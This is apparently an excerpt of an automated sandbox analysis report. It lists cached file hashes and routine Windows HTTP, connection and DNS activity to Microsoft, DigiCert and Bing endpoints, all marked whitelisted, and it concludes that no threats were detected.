5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\76h-lqe82bg-bnu-ApkwUALogkQ.br[1].jsbinary
MD5:88B4876820BB8069FE375BC4577DAFC9
SHA256:19BAD3107546F7914AB0F1CE545F187D7DD26F90D05F26C3C326D1BD941F0EA8
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\FBodW3lwNP5Qe6iF-d8dpJdC9lc.br[1].jsbinary
MD5:D5A9CF9F056ECA6B2ED32286F3E06FCA
SHA256:8C4E98F5AF24F2FB97B5F4051AEB791BF79E1A3DDEA8858CE3D64CBBDA681887
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
60
DNS requests
38
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3584
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3584
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4128
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
3584
svchost.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3584
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
92.123.104.62:443
www.bing.com
Akamai International B.V.
DE
whitelisted
1176
svchost.exe
20.190.160.22:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5064
SearchApp.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.78
whitelisted
www.bing.com
  • 92.123.104.62
  • 92.123.104.59
  • 92.123.104.52
  • 92.123.104.61
  • 92.123.104.34
  • 92.123.104.47
  • 92.123.104.25
  • 92.123.104.33
  • 92.123.104.32
  • 2.21.65.154
  • 2.21.65.132
whitelisted
login.live.com
  • 20.190.160.22
  • 20.190.160.20
  • 20.190.160.14
  • 40.126.32.134
  • 40.126.32.136
  • 40.126.32.76
  • 40.126.32.138
  • 20.190.160.17
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 2.23.77.188
whitelisted
go.microsoft.com
  • 69.192.162.125
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.31.169.57
whitelisted

Threats

No threats detected
No debug info